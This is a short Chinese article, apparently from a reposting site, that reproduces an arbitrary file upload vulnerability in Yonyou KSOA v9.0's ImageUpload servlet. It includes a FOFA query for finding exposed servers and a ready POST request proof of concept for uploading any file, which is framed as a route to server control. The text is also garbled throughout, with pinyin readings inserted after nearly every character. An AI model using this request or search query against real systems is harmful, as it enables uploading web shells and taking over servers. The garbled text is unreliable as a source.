1、產(chǎn)品簡介
??用友時空KSOA是建立在SOA理念指導(dǎo)下研發(fā)的新一代產(chǎn)品,是根據(jù)流通企業(yè)最前沿的I需求推出的統(tǒng)一的IT基礎(chǔ)架構(gòu),它可以讓流通企業(yè)各個時期建立的IT系統(tǒng)之間彼此輕松對話,幫助流通企業(yè)保護原有的IT投資,簡化IT管理,提升競爭能力,確保企業(yè)整體的戰(zhàn)略目標以及創(chuàng)新活動的實現(xiàn)。
2、漏洞概述
? ?用友時空KSOA平臺ImageUpload處存在任意文件上傳漏洞,攻擊者通過漏洞可以獲取服務(wù)器權(quán)限。?
3、影響范圍
? 用友時空企業(yè)信息融通平臺KSOA v9.0
4、復(fù)現(xiàn)環(huán)境
? FOFA:app="用友-時空KSOA"
5、漏洞復(fù)現(xiàn)
burp抓取首頁包發(fā)送Repeater模塊進行復(fù)現(xiàn)?
?POC文章來源:http://www.zghlxwxcb.cn/news/detail-606683.html
POST /servlet/com.sksoft.bill.ImageUpload?filename=[上傳的文件名]&filepath=/ HTTP/1.1
Host: your-ip
[文件內(nèi)容]
?文章來源地址http://www.zghlxwxcb.cn/news/detail-606683.html
到了這里,關(guān)于用友時空KSOA ImageUpload任意文件上傳漏洞復(fù)現(xiàn)+利用的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!